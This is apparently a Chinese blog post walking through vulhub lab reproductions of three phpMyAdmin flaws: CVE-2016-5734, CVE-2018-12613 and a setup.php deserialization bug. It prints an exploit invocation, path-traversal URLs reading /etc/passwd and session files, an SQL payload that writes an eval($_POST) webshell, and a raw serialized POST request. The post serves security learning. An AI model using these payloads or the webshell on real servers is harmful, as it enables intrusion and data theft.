vulhub-phpmyadmin

于 2022-10-02 23:10:10 发布
阅读量354 收藏
点赞数
分类专栏: vulhub 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55654781/article/details/127147573
版权

phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(CVE-2016-5734)

一 漏洞描述

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。

在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。

受影响版本

  • 4.0.10.16之前4.0.x版本
  • 4.4.15.7之前4.4.x版本
  • 4.6.3之前4.6.x版本(实际上由于该版本要求PHP5.5+,所以无法复现本漏洞)

二 环境搭建docker-compose,vulhub

https://blog.csdn.net/weixin_52221158/article/details/125933759

vulhub:https://github.com/vulhub/vulhub

┌──(root💀kali)-[/vulhub-master/phpmyadmin/CVE-2016-5734]
└─# docker-compose up -d

目标 kali 192.168.1.240

攻击机 192.168.1.162

三 漏洞复现

访问ip:port,账号密码:root

在这里插入图片描述

因为目标环境使用root,所以我们可以创建一个临时数据库和数据表,进行漏洞利用。POChttps://www.exploit-db.com/exploits/40185来复现漏洞。

 ./cve-2016-5734.py -c 'system(id);' -u root -p root -d test http://192.168.1.240:8080/

在这里插入图片描述

-d是已经可以写的数据库,-c是待执行的PHP语句,如果没有指定表名,这个POC会创建一个名为prgpwn的表。

四 参考链接

https://github.com/vulhub/vulhub/blob/master/phpmyadmin/CVE-2016-5734/README.zh-cn.md

phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)

一 漏洞描述

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞

二 环境搭建docker-compose,vulhub

https://blog.csdn.net/weixin_52221158/article/details/125933759

vulhub:https://github.com/vulhub/vulhub

/vulhub-master/phpmyadmin/CVE-2018-12613]
└─# docker-compose up -d

目标 kali 192.168.1.240

攻击机 192.168.1.162

三 漏洞复现

访问ip:端口,进入phpmyadmin 配置的是“config”模式,所以无需输入密码,直接登录test账户

在这里插入图片描述

访问http://your-ip:8080/index.php?target=db_sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd,可见/etc/passwd被读取,说明文件包含漏洞存在:

在这里插入图片描述

查询语句select ‘<?phpinfo()?>’,在f12界面查找数据包中cookie中phpmyadmin的值,包含在session中访问

在这里插入图片描述

访问http://192.168.1.240:8080/index.php?target=db_sql.php?/…/…/…/…/…/…/…/…/tmp/sess_f4a978116bc78bbc4f935a1f4793466c

在这里插入图片描述

通过查询语句phpinfo查看web路径

在这里插入图片描述

构造payload,并访问http://192.168.1.240:8080/index.php?target=db_sql.php?/…/…/…/…/…/…/…/…/tmp/sess_f4a978116bc78bbc4f935a1f4793466c

select "<?php file_put_contents('/var/www/html/shell.php','<?php @eval($_POST[bq]);?>')?>"

蚁剑连接

在这里插入图片描述

四 参考链接

https://blog.csdn.net/weixin_51387754/article/details/121761923

https://blog.csdn.net/weixin_44037296/article/details/111039461

phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)

一 漏洞描述

phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。

受影响版本

phpmyadmin 2.x

二 环境搭建docker-compose,vulhub

https://blog.csdn.net/weixin_52221158/article/details/125933759

vulhub:https://github.com/vulhub/vulhub

/vulhub-master/phpmyadmin/WooYun-2016-199433]
└─# docker-compose up -d

目标 kali 192.168.1.240

攻击机 192.168.1.162

三 漏洞复现

访问ip:端口

在这里插入图片描述

抓取并修改数据包,可以读取/etc/passwd内容(修改url和添加Content-Type)

POST /scripts/setup.php HTTP/1.1
Host: 192.168.1.240:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept: */*     text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en
Cookie: pma_collation_connection=utf8_unicode_ci; pma_lang=en; pma_console_height=92; pma_console_config=%7B%22alwaysExpand%22%3Afalse%2C%22startHistory%22%3Afalse%2C%22currentQuery%22%3Atrue%7D; pma_console_mode=collapse; pma_iv-1=AvOYs%2F3TaCN2dEXoumshfQ%3D%3D; pmaUser-1=vdAOIQIwDWh0pDg9vXC1rQ%3D%3D; pmaPass-1=p2lFovkjDZt3nxLhB1NL%2Bw%3D%3D; phpMyAdmin=f4a978116bc78bbc4f935a1f4793466c; auto_saved_sql_sort=
Connection: close
Content-Length: 80
Content-Type: application/x-www-form-urlencoded

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-f00pz2Mp-1664723150664)(C:/img/php/10.png)]

application/x-www-form-urlencoded:是一种编码格式,窗体数据被编码为名称/值对,是标准的编码格式。
当action为get时候,浏览器用x-www-form-urlencoded的编码方式把form数据转换成一个字串(name1=value1&name2=value2…),然后把这个字串append到url后面,用?分割,加载这个新的url。 当action为post时候,浏览器把form数据封装到http body中,然后发送到server。

四 参考链接

https://github.com/vulhub/vulhub/blob/master/phpmyadmin/WooYun-2016-199433/README.zh-cn.md

人机(未转人工)
关注
专栏目录
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613
qq_51577576的博客
10-06 690
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613 在4.8.2之前的phpMyAdmin 4.8.x中发现了一个问题,攻击者可以在其中包含(查看并可能执行)服务器上的文件。该漏洞来自页面重定向和在phpMyAdmin中加载的部分代码,以及对列入白名单的页面的不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码)外,攻击者还必须经过身份验证。
[ vulhub漏洞复现篇 ] Phpmyadmin后台代码执行CVE-2016-5734
最新发布
qq_51577576的博客
10-05 1018
[ vulhub漏洞复现篇 ] Phpmyadmin后台代码执行CVE-2016-5734 CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x 版本(直至 4.4.15.7),和 4.0.x 版本(直至 4.0.10.16)。 CVE的作者利用在p
[Vulhub](CVE-2018-12613)phpmyadmin 4.8.1远程文件包含漏洞
weixin_45605352的博客
05-06 1018
0x01 预备知识 什么是文件包含漏洞? 攻击者利用包含的特性,加上应用本身对文件(包含)控制不严格,最终造成攻击者进行任意文件包含。(注:包含的文件会被当成脚本文件来解析) 一句话来说就是:文件包含并不属于漏洞,但是由于对包含进来的文件不可控,导致了文件包含漏洞的产生。 本地文件包含叫做LFI,远程文件包含叫做RFI,默认PHP不开启远程文件包含。 相关函数 include:PHP运行到include然后去调用被包含文件执行,如果包含文件不存在则报错,但是会继续往下执行; require:PHP在运
[Vulhub](CVE-2016-5734)phpmyadmin 4.0.x-4.6.2远程执行代码漏洞
weixin_45605352的博客
05-06 342
0x01 漏洞描述 该漏洞在preg_replace函数中,因为用户提交的信息可以被拼接到第一个参数中。该函数时执行一个正则表达式并实现字符串的搜索和替换。 preg_replace ( string|array $pattern , string|array $replacement , string|array $subject , int $limit = -1 , int &$count = null ) : string|array|null 搜索 subject 中匹配 pattern
[vulhub]_phpmyadmin_4.8.1_远程文件包含(cve-2018-12613)复现&RCE实现
fightte的博客
06-05 614
[网络安全任重道远] ~ 题目有点长 ~ 是这样的。这是vulhub的复现,算是第一个接触的vulhub吧,FFFLLLAAAGGG ~ vulhub ----- 是一个漏洞集成平台,依赖于docker,可以方便的复现漏洞,github上有 phpmyadmin ----- 是网页版的数据库管理工具, CVE编号是 ----- CVE-2018-12613, 其漏洞有 ----- 文件包含和远程命令执行, ~ 过程 漏洞具体原因可参考: https://www.cnblogs.com/leixiao-/p/
[Vulhub](WooYun-2016-199433)phpmyadmin反序列化漏洞
weixin_45605352的博客
04-25 881
0x01 预备知识 什么是序列化 序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串】 简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中 当在php中创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。 什么是反序列化
vulhub漏洞复现52_phpMyAdmin
weixin_44193247的博客
02-11 690
vulhub漏洞复现练习篇
Vulhub-php_xxe
Mccc_li的博客
04-16 837
test
phpMyAdmin文件包含漏洞复现(CVE-2018-12613)
qq_34853514的博客
07-12 559
漏洞简介 漏洞编号: CVE-2018-12613 漏洞详情: 该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定已经控制的任何主机,并在phpMyAdmin上执行任意代码 $ cfg [‘ServerDefault’] = 0:这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码 漏洞影响范围: phpMyAdm
Vulhub靶场 --- Kioptrix: Level 1.2 (#3)
m0_52072483的博客
01-28 340
Vulhub靶场 — Kioptrix: Level 1.2 (#3) 1、信息搜集 nmap nmap -sV -O -p- 192.168.76.29 dirb dirb http://192.168.76.29 以上有用的信息仅有phpmyadmin wapplayzer 2、getshell 在登录页面发现cms 查找此cms是否有可利用的漏洞 这里两个结果并未利用成功 git clone https://github.com/Hood3dRob1n/LotusCMS-Exploi
渗透靶场——Vulnhub:Billu_Box
tlovejr的博客
02-25 1047
部署环境: 提供镜像文件后,直接用虚拟机打开即可(中间会遇到错误什么的,直接点击重试或者继续即可),连接方式用NET方式连接。 Kali机ip地址:192.168.40.129 靶机ip地址:192.168.40.149 首先查看存活的靶机ip地址,在这里一共有三种方法,可以自己选择一种自己比较喜欢的。 nmap探测存活主机 Nmap -sn 192.168.40.0/24 Netdiscover探测存活主机(时间会有点长) netdiscover -i eth0 -r 192.168.
phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 漏洞复现
Senimo
12-11 1690
漏洞复现 phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 APP:phpMyAdmin 4.8.1 CVE:CVE-2018-12613 类型:远程文件包含 下载phpMyAdmin 4.8.1源码 漏洞问题出现在index.php页面55~63: // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_str
PhpMyAdmin4.8.1后台文件包含漏洞复现(CVE-2018-12613)
hclimg的博客
10-30 2307
phpmyadmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 漏洞复现环境:基于某平台的在线靶场进行漏洞复现 复现过程: 1. 访问网址,是一处phpmyadmin的登录地址首页,通过弱密码可以进入数据库管理界面 2. 根据在网上曝光的CVE-2018-1...
phpmyadmin(CVE-2018-12613)漏洞利用
hhiollk的博客
04-01 1403
1、漏洞描述 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg ['AllowArbitraryServer'] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ cfg ...
每天复现一个漏洞--vulhub
微赚淘客系统开发者博客
11-30 949
phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433) 漏洞原理:http://www.polaris-lab.com/index.php/archives/66/ 根据提示我们先进入到 /scripts/setup.php 的目录下 由于 configuration 参数是可控的 所以我们可以根据 poc...
phpmyadmin远程代码执行漏洞(CVE-2016-5734)
笑花大王
03-27 1009
简介 环境复现:https://github.com/vulhub/vulhub 线上平台:榆林学院内可使用协会内部的网络安全实验平台 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。 影响版本 phpmyadmin4.3.0-4.6.2 代码审计 待更新.... 漏洞利用 漏洞利用py #!/usr/bin/env python """cve-2016-...
SSH免密码登录
骐骥一跃,不能十步;驽马十驾,功在不舍。
10-23 273
ssh 无密码登录要使用公钥与私钥。linux下可以用ssh-keygen生成公钥/私钥对,现在,以服务器centos(ip地址192.168.1.240),客户端ubuntu的例子进行说明。
墨者靶场 入门:phpMyAdmin后台文件包含分析溯源
qq_43233085的博客
01-13 865
墨者靶场 入门:phpMyAdmin后台文件包含分析溯源题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 实训目标 1、了解此漏洞形成的原因; 2、掌握此漏洞的利用方式。 解题方向 根据漏洞编号找到相关知识。 解题步骤 启动靶场...
phpmyadmin后台文件包含漏洞分析
nareku的博客
04-10 5972
前言 在墨者学院看到这道题给的标签是文件包含,就想着拿来练练手,果然不练不知道一练吓一跳,里面还是有很多我没学到和不懂的知识,所以就打算单独拿出来写一篇博客来记录一下。
phpMyAdmin3.5.0-dev安装与配置指南
1. 从官方网站phpmyadmin.net下载适合的版本,如phpMyAdmin-x.x.x-all-languages.tar.gz。 2. 解压缩文件至网站服务器的文档根目录,或者在本地解压后通过FTP上传。 3. 确保所有脚本具有正确所有权,避免因PHP安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值